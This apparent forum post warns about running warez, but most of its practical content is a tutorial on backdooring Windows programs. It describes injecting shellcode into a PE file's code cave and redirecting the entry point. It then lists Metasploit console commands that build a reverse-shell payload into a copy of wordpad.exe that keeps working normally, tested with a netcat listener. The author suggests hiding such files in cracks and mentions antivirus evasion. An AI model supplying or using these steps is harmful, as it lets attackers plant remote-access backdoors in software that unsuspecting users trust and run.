Some people tend to download and run programs without much concern. Some people even download warez, keygens and cracks, just to find out that they got a shareware program for free. Wow! But think about it. If you wanted to install backdoors (or whatever malware), warez would be a great way of getting it installed.
So what is a backdoor? It is usually thought of as a means of someone from remote to get access to your computer. Either a listening port for someone to connect to (standard shell), or an outbound connection to hand over a shell to a remote listening port (reverse shell), or just some other way to grant unauthorized users access. The protocol used to communicate over (regarding shells) can of course vary and are limited by creativity and skills (tcp, dns, icmp, etc).
So how do you get shellcode? Get Metasploit, it has lots of shellcode that you can generate with confguration. When you have your shellcode, you will need to inject it into a program (infect). Basically code injection is about;
- Locate a place with enough 00's inside the PE image to put the shellcode (a code cave).
- Identify OEP and insert a jump to code cave.
- Place original code at old OEP in front of shellcode.
- At end of shellcode, put a jump back at instruction right after the jump that pointed to the shellcode (for simplicity think of it as OEP+1).
- Now program execution should jump immediately to shellcode when program strats, and then return to normal execution when shellcode is finished (debuggers are useful).
The module works great most of the times, but has a few bugs. My experience is that sometimes the infected program crash. So with this tool it is now a nobrainer to create an effective backdoor. So don't you think it's a great way to install such backdoors, when hiding them inside cracks or precracked programs? Sure it is! And that's what was the main purpose of this thread: To show why warez may be devastating to you or your system (and not forgetting the legal issues about it). Maybe not even limited to warez, so think about it next you download and execute something you don't really know what is. Other tutorials found may cover how to create such exe's undetectable for AV, by using other modules in Metasploit. However that would not affect the easy sections table detection trick..
In my test I ran Metasploit v4.3.0-dev.14649. Using the browser GUI apparently required a license, so I just used the msf console which has always worked great.
help show payloads use windows/shell_reverse_tcp (use a payload) info (info on usage) set lhost 127.0.0.1 (set variable) set lport 4444 (set variable) generate -h (help on payload generation) generate -k -t exe -x wordpad.exe -f wordpad_mod.exe (templates param x = msf3datatemplates) (output param f = msf3) generate -t raw -f raw.bin (can be launched in my ShellCodeExecGUI) nc -l -p 4444 (for testing with netcat if our modified wordpad_mod.exe works)
You may wonder why lhost and lport with a reverse shell.. I guess there an error in the module and it should say rhost and rport, so never mind just think of l* as r* for this particular payload.
Also I thought a Windows tutorial was about time, as most if not all are linux based.
Edit: Tools posted in this thread are now put this into the reboot download section; http://reboot.pro/16550/